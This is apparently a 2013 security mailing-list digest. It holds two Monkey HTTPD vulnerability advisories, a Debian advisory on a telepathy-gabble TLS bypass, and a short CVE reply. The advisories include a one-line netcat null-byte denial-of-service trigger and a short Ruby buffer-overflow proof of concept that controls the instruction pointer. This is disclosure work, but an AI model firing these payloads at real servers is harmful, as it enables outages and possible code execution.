CVE-2013-3724 Monkey HTTPD 1.1.1 - Denial of Service Vulnerability
1. Title CVE-2013-3724 Monkey HTTPD 1.1.1 - Denial of Service Vul- nerability 2. Introduction Monkey is a lightweight and powerful web server for GNU/Linux. It has been designed to be very scalable with low memory and CPU consumption, the perfect solution for embedded devices. Made for ARM, x86 and x64. 3. Abstract The vulnerability is a denial of service which is caused by sending a null byte in an HTTP request to the web server. 4. Report Timeline 2013-05-23 Discovered vulnerability via fuzzing 2013-05-25 Vendor Notification 2013-05-26 Vendor Response/Feedback 2013-05-27 Vendor Fix/Patch 2013-05-28 Public disclosure 5. Status Published 6. Affected Products Monkey HTTPD 1.1.1 7. Exploitation Technique Remote 8. Details A bug discovered in Monkey's HTTP parser allows an attacker to cause a segmentation fault in one of the daemon's threads using a specially crafted request containing a null byte. An attacker can crash all the available threads by sending the specially crafted request multiple times, rendering the server useless for legitimate users. 9. Proof of Concept The vulnerability can be exploited by remote attacker without any special privileges. The placement of the null byte within the request does not seem to have any effect on the result. The null byte may even be used instead of an HTTP method such as, GET. Below is an example of how this bug can be manually triggered: ruby -e 'puts GET /\x00 HTTP/1.1\r\n\r\n'|netcat localhost 2001 10. Solution This vulnerability has been fixed for the 1.2.0 release. 11. Risk The security risk of the DoS vulnerability is estimated as low. 12. References http://bugs.monkey-project.com/ticket/181 13. Credits Doug Prostko dougtko[at]gmail[dot]com Vulnerability discovery
CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS Vulnerability With Possible Arbitrary Code Execution
1. Title CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS Vulnerability With Possible Arbitrary Code Execution 2. Introduction Monkey is a lightweight and powerful web server for GNU/Linux. It has been designed to be very scalable with low memory and CPU consumption, the perfect solution for embedded devices. Made for ARM, x86 and x64. 3. Abstract A specially crafted request sent to the Monkey HTTPD server triggers a buffer overflow which can be used to control the flow of execution. 4. Report Timeline 2013-05-29 Discovered vulnerability via fuzzing 2013-05-30 Vendor Notification 5. Status Published 6. Affected Products Monkey HTTPD = 1.2.0 7. Exploitation Technique Remote 8. Details Improper bounds checking while parsing headers allows for an attacker to craft a request that will trigger a buffer overflow during a call to memcpy() on line 268 in the file, mk_request.c. 9. Proof of Concept The vulnerability can be exploited by remote attacker without any special privileges. Under Ubuntu 13.04, an offset of 2511 lines up the instruction pointer with, 0x42424242. #!/usr/bin/env ruby require socket host = localhost port = 2001 s = TCPSocket.open(host, port) buf = GET / HTTP/1.1\r\n buf Host: + \r\n buf localhost\r\n buf Bad: buf A * 2511 buf B * 4 s.puts(buf) 10. Solution There is currently no solution. 11. Risk Risk should be considered high since it can be shown that the flow of execution can be controlled by an attacker. 12. References http://bugs.monkey-project.com/ticket/182 13. Credits Doug Prostko dougtko[at]gmail[dot]com Vulnerability discovery
[SECURITY] [DSA 2702-1] telepathy-gabble security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2702-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso June 03, 2013 http://www.debian.org/security/faq - - Package: telepathy-gabble Vulnerability : TLS verification bypass Problem type : remote Debian-specific: no CVE ID : CVE-2013-1431 Maksim Otstavnov discovered that the Wocky submodule used by telepathy-gabble, the Jabber/XMPP connection manager for the Telepathy framework, does not respect the tls-required flag on legacy Jabber servers. A network intermediary could use this vulnerability to bypass TLS verification and perform a man-in-the-middle attack. For the oldstable distribution (squeeze), this problem has been fixed in version 0.9.15-1+squeeze2. For the stable distribution (wheezy), this problem has been fixed in version 0.16.5-1+deb7u1. For the testing distribution (jessie) and the unstable distribution (sid), this problem has been fixed in version 0.16.6-1. We recommend that you upgrade your telepathy-gabble packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCgAGBQJRrN7oAAoJEHidbwV/2GP+w7UQAPdyY+3efgaylM7RFwzpI46R zoGZBdjOBNwjKMIKRC2T77R8UOk5IAHCxTTW0SPI4gfbAktIP+w9TTMd5KnpIyH3 7ATwATgEVbtaNdLLLlGd5mBy3GbJ/FbshJcpk8K5vKMGMgQDrzLO87N+zW4XwTda JuaRl0s9n7enFADtDNZggYX/2KFNft2t4FVHJFjN3kX64oeTJ+E77oeD2J+pt5+T Dv+MlL2+cmE0jNzKIEvRQ8fudNCeHlfkfAT24vxlHUnj/JXxl9jxtGFiFDurvc7j 5d18QvvJAL2MtcTxMqbdeiYW3Xf2aVKg/E+a9DfEqM6DHEKwNy8+rezvAuB4Evlv 6PTA5y8+L0ML2jgYGdyVYT9QKcLmbrXRJEB12x7qF/nDEi2Hem+I5lhwe9pxGAZV TVO99XWUZ4ynS8NSMCnGOlwBy7hQlTP/DHlAlSRv9M+rcjyAPNXZXXKQXsA1e8f6 K7xYlhzde1mjBjWL+qaaNyaBYpNsczjFwHs3BZVeWHzXtIp8UkRs8/Q1GUbE9q80 OyFgFMIViY4Th1Gasvf6Whnkf0oysm1DdIyor1lvDphnTRYFl+KVumaTYyTtyq19 reOK8uK4+R+809xa7uX3a0bZbTbPD3IAKfyf1ohUnUW+RgAKelMgCw1E2msfa/XT uUo0CA7JK1ajStmkolxg =nfk7 -END PGP SIGNATURE-
Re: Monkey HTTPD 1.1.1 - Denial of Service Vulnerability
CVE reserved for this bug: CVE-2013-3724
